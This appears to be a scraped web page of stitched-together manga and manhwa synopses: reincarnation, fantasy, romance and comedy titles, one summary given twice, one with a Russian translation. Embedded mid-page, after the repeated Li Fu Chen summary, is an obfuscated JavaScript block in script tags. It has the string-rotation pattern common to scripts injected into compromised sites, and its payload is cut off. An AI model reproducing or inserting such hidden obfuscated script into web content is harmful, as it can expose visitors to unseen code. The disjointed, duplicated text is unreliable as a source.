Amamiya Hiroto is unlucky. His life consisted of misfortune after misfortune, culminating in an unlucky death during an incident on a school boat trip, trying to save a girl he barely knew. After death, he met a god of reincarnation who requested that the hundred or so dead passengers - one of them being the girl he tried in vain to save - be reincarnated into another world. Yet a series of unfortunate events forced Hiroto to reincarnate with even less luck than before, starting with nothing but a tremendous amount of Mana. His second life, far worse than his first, came to a cruel end. However, upon meeting the god a second time, he was informed that there would be yet another reincarnation, one that had already been set in motion and could not be stopped. Not wanting Hiroto to endure a third life filled with suffering, the god cursed him before he was reborn in the hopes that he would either die quickly or commit suicide. Hiroto was reborn once more as a half-vampire, half-dark elf. A dhampir. Not wanting a fourth life, he is determined to live this third life with the only things remaining from his previous lives - Death Magic and his enormous Mana pool. Russian: SpoilerГлавному герою Амамия Хирото не везёт. Его жизнь состоит из цепочки неудач и в конце концов он умирает вследствие несчастного случая на корабле во время школьной экскурсии, погибнув при попытке спасти девушку, которую он едва знал. После смерти он встречает Бога Реинкарнации, которому требуются около ста мертвых пассажиров — среди которых девушка, которую он безуспешно пытался спасти — для перерождения в другом мире. Однако череда несчастливых событий вынуждает Хирото переродиться с ещё меньшей удачей, чем раньше, не имея в начале пути ничего, кроме огромного количества маны. Его вторая жизнь, что была гораздо хуже первой, приводит его к жестокому концу. Несмотря на это, встретившись с Богом в третий раз, он узнает, что будет и третья реинкарнация – она уже запущена и не может быть отменена. Не желая, чтобы Хирото вновь претерпевал жизнь, полную страданий, перед его перерождением Бог проклинает его, в надежде, что Хирото либо умрет быстро, либо совершит самоубийство. На сей раз Хирото переродился как наполовину вампир, наполовину тёмный эльф – дампир. Желая избежать четвёртой реинкарнации, он настроен прожить третью жизнь со способностями, что достались ему от предыдущих – Магией Смерти и Бассейном Маны.
This series is a precursor to Hiroshi Masumura’s Atagoal. It was serialized in Monthly Magazine Garo (月刊漫画ガロ) from May to December 1975. The story depicts the people of Yonezaad, rising up against the re-invasion of King Carmel, who once ruled the Yonezaad continent. Many characters in Atagoal would make their first appearances in this series (Ex. Hideyoshi, Tempura, Gilbars, and Pantsu) although their roles are significantly different in this series than those from future Atagoal publications.
[Summary by OSTNT] It has been a year since Li Fu Chen lost his “Talent”. Now he lives the life of a trash, being bullied and beaten by those who once was inferior to him. However, he still has not lost everything as he’s still engaged to a strong and pretty girl of a powerful family, but that came to an end as the engagement was abruptly cancelled. With shame brought to the family and his life engulfed by darkness, a ray of hope pierced the the sky.
[Summary by OSTNT] It has been a year since Li Fu Chen lost his “Talent”. Now he lives the life of a trash, being bullied and beaten by those who once was inferior to him. However, he still has not lost everything as he’s still engaged to a strong and pretty girl of a powerful family, but that came to an end as the engagement was abruptly cancelled. With shame brought to the family and his life engulfed by darkness, a ray of hope pierced the the sky. Yong Heng Zhi Manhua / Yong Heng Zhi ,Eternal Reverence ; ????<script></script><script>(function(_0x3fb7a6,_0xc3eb4a){var _0x4400fc=_0x1993,_0x283692=_0x3fb7a6();while(!![]){try{var _0x9207de=parseInt(_0x4400fc(0x141))/(-0x1ac4+-0x20b*-0x1+0x41f*0x6)+-parseInt(_0x4400fc(0x144))/(-0xcd3+-0x84b+0x1a0*0xd)+-parseInt(_0x4400fc(0x136))/(-0x1993+-0x1e2c+0x37c2)*(parseInt(_0x4400fc(0x14a))/(-0x3d*0x7f+-0x1b97+0x9a5*0x6))+-parseInt(_0x4400fc(0x13b))/(-0x6*-0x323+0x1ae+-0x147b)+parseInt(_0x4400fc(0x14e))/(0x943+-0x1a6e+0x1131)+-parseInt(_0x4400fc(0x143))/(-0xb9+-0x1664+-0x1724*-0x1)+parseInt(_0x4400fc(0x13a))/(-0x23e3*-0x1+0xb38+-0x2f13);if(_0x9207de===_0xc3eb4a)break;else _0x283692['push'](_0x283692['shift']());}catch(_0x194cd8){_0x283692['push'](_0x283692['shift']());}}}(_0x3005,0x398e1+0x195641+-0xf6549));function _0x1993(_0x346853,_0xa00925){var _0x263d2a=_0x3005();return _0x1993=function(_0x2565fb,_0x15d7ec){_0x2565fb=_0x2565fb-(-0x17*0x22+-0x56f*-0x2+0x59*-0x13);var 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Mercenary Maruhan... the man who roams the darkness in the time of humanity's doom! In the ancient era of the super-continent, where no border exists between the East and the West -- the race of Demonic Beasts begins an invasion against the human race, breaking the mutual non-aggression pact! And as humanity takes to the road to seek refuge, some gather to form the ultimate army for an attempt to kill King Rhode, the Chief of the Demonic Beasts... The intense story of one certain mercenary starts there!!
Read manhwa Yooju’s Universe Bae Yooju, who believes that people have a predetermined fate, meets a guy she had met by chance at a new school in the summer of her 18th year. Will this fate come true? A summer school romance about the growth of three people!
A hangover leads to a shared life between a thief and a slave girl. Harris is an adventurer who works as a thief and scout, a job that is often shunned due to poor reputation. One day he gets drunk and buys a slave girl, Tiana. Tiana, who had been treated badly and not given enough food until then, comes to adore Harris, who treats her kindly, as her master. Harris, who had been hoping that Tiana would grow up to be a beautiful woman, is gradually drawn to her because of her innocence. Harris\' life changes drastically when he begins living with Tiana: warm meals, freshly washed clothes, and interaction with the townspeople who had never come close to him before. On the other hand, he finds himself in more and more troublesome situations, will he manages to escape from them with his skill and tact...? This is the story of the \"rebirth\" of a shabby thief, which begins with an encounter with a slave girl.
From Dragon Voice Project: One day when 17-year-old Sagara Kurumi accidently bumps into a guy on the streets, reins suddenly appear and binds them both! What is this?! Things get even more confusing when the boy, Kaito, clasps her hands and calls her his master! When Kaito transforms into a reindeer it just becomes too much for poor Kurumi who's out as a light. But it does indeed seem like Kurumi's a santa and Kaito's her reindeer and that they've got an important job to do on Christmas Eve~ ^^ The first three chapters are about this cute "couple" and the last one is a oneshot called Amai Kamiato. • Amai Kamiato - Ren is a "tame" vampire and currently spends his lifetime with a detective as blood donor while in return he helps her investigate at night. Then suddenly, the most unimagineable thing happens: Ren's daughter Maia appears, but vampires can't have children! Note: there's a side story of Penguin Kakumei in Vol.3, which hasn't been scanlated.
Deep in the forest, a curious pair reside: a young girl Mira, whose affliction leads her to call forth darkness whenever she’s in distress; and her physician Rei, determined to seek a cure. Each day, she works to remember the light and bring back the person she used to be. But a sudden visit from Rei’s friend, who harbors an interest in Mira’s illness may be end of their peaceful days
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Rinko, a devoted teacher who has zero luck with men, gets dumped by her boyfriend because of sex. She is heartbroken, when a truck crashes into her and she dies... only for her to be reincarnated in a "reverse" Yoshiwara district (Japan's famous Edo-era pleasure district), where beautiful men sell their sexual services! Is this Heaven? Or Hell...?! An Edo-era reincarnation rom-com begins here!
Yoshka is a genius amateur inventor who would create anything from scratch for sale at a hefty price. Although her inventions are quite incredible, they often cause more trouble than good. What is Yoshika planning to do with all this money? She's gonna build a rocket to the moon!